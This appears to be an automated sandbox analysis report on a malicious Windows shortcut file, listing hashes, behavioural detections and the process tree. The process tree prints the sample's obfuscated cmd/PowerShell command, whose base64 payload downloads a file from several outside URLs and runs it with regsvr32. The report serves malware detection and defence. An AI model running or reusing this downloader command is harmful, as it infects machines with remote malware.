Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
13-11-2024 11:03
Static task
static1
Behavioral task
behavioral1
Sample
b22ec84aa47a96fcc20d782d74a3f16f915e455a30d1178f4fad1466633f0b55.lnk
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
b22ec84aa47a96fcc20d782d74a3f16f915e455a30d1178f4fad1466633f0b55.lnk
Resource
win10v2004-20241007-en
General
-
Target
b22ec84aa47a96fcc20d782d74a3f16f915e455a30d1178f4fad1466633f0b55.lnk
-
Size
2KB
-
MD5
fbddf679b584e0f043673397d8642215
-
SHA1
d1e2a9b2591560b075626140a51f3abbdce61a74
-
SHA256
b22ec84aa47a96fcc20d782d74a3f16f915e455a30d1178f4fad1466633f0b55
-
SHA512
7159c50d5532c69b526043ebacb1ccc8690823b67e45422263b9a2dd736ddb50020e136b3d8bf6f1ac95f92901f62de81f778da8fb1120c6c76b594e045d5ff2
Malware Config
Signatures
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
Processes:
cmd.exepid Process 1988 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid Process 1636 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 1636 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.execmd.exedescription pid Process procid_target PID 1644 wrote to memory of 1988 1644 cmd.exe 31 PID 1644 wrote to memory of 1988 1644 cmd.exe 31 PID 1644 wrote to memory of 1988 1644 cmd.exe 31 PID 1988 wrote to memory of 1636 1988 cmd.exe 32 PID 1988 wrote to memory of 1636 1988 cmd.exe 32 PID 1988 wrote to memory of 1636 1988 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\b22ec84aa47a96fcc20d782d74a3f16f915e455a30d1178f4fad1466633f0b55.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /v:on /c FNBmwxR6QxBkrgJ+BX6Miv/JjezYHuOEw18Vc+d4q4lm2Szx6nmR8zgeg19If6ewK09230Kh||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$Br='ICAgICAgIFdyaXRlLUhvc3QgInVQTlNJIjskUHJvZ3Jlc3NQcmVmZXJlbmNlPSJTaWxlbnRseUNvbnRpbnVlIjskbGlua3M9KCJodHRwOi8vd3d3LmpwcmFydHMuY29tL3NzbC9ROFY5NTBIRm01NnlVUG5RaEEvIiwiaHR0cDovL3JlZG1hZy1kei5jb20vam9vbWxhL0s2NnMxSVU5aC8iLCJodHRwOi8vcmV6YS1raGFsYWouY29tL2F3c3RhdHMvd0U2YmN6SWUycC8iLCJodHRwOi8vd3d3Lmpzb25zaW50bC5jb20vUnhzR2dvVld6OS8iLCJodHRwczovL29ycXVlc3RhbWVkaWEuY29tL0ZhY2Vib29rL2x1VXN5a1JrVC8iLCJodHRwOi8vcGlmZmwuY29tL3BpZmZsLmNvbS9SZFMwdWVrNURNZEUwMHkvIik7JHQ9IkloVXlNIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEFNemJmdGl4bkguV05UO1JlZ3N2cjMyLmV4ZSAiJGRcQU16YmZ0aXhuSC5XTlQiO2JyZWFrfSBjYXRjaCB7IH19';$Oh=[System.Convert]::FromBase64String($Br);$Xr=[System.Text.Encoding]::ASCII.GetString($Oh); iex ($Xr)}"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c "&{$Br='ICAgICAgIFdyaXRlLUhvc3QgInVQTlNJIjskUHJvZ3Jlc3NQcmVmZXJlbmNlPSJTaWxlbnRseUNvbnRpbnVlIjskbGlua3M9KCJodHRwOi8vd3d3LmpwcmFydHMuY29tL3NzbC9ROFY5NTBIRm01NnlVUG5RaEEvIiwiaHR0cDovL3JlZG1hZy1kei5jb20vam9vbWxhL0s2NnMxSVU5aC8iLCJodHRwOi8vcmV6YS1raGFsYWouY29tL2F3c3RhdHMvd0U2YmN6SWUycC8iLCJodHRwOi8vd3d3Lmpzb25zaW50bC5jb20vUnhzR2dvVld6OS8iLCJodHRwczovL29ycXVlc3RhbWVkaWEuY29tL0ZhY2Vib29rL2x1VXN5a1JrVC8iLCJodHRwOi8vcGlmZmwuY29tL3BpZmZsLmNvbS9SZFMwdWVrNURNZEUwMHkvIik7JHQ9IkloVXlNIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEFNemJmdGl4bkguV05UO1JlZ3N2cjMyLmV4ZSAiJGRcQU16YmZ0aXhuSC5XTlQiO2JyZWFrfSBjYXRjaCB7IH19';$Oh=[System.Convert]::FromBase64String($Br);$Xr=[System.Text.Encoding]::ASCII.GetString($Oh); iex ($Xr)}"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1636
-
-